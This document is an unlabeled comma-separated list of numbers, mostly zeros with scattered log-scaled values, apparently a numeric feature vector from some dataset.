0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 11.613215656391521, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.2958368660043296, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 5.8066078281957605, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 4.182806904693496, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 1.6094379124341003, 0.0, 0, 0.0, 0, 0, 0.0, 1.9459101490553132, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253877, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.970291913552122, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.77912349311153, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 10.73885431325499, 0, 0.0, 1.791759469228055, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 1.9459101490553132, 0.0, 2.8398715690385097, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 2.70805020110221, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 9.19044141596179, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.4825185607408002, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.804021044733257, 0.0, 0, 0.0, 0.0, 2.9957322735539913, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 3.8918202981106265, 3.649511027115099, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4339872044851467, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.7612001156935624, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.330733340286331, 2.1972245773362196, 0.0, 0.0, 0.0, 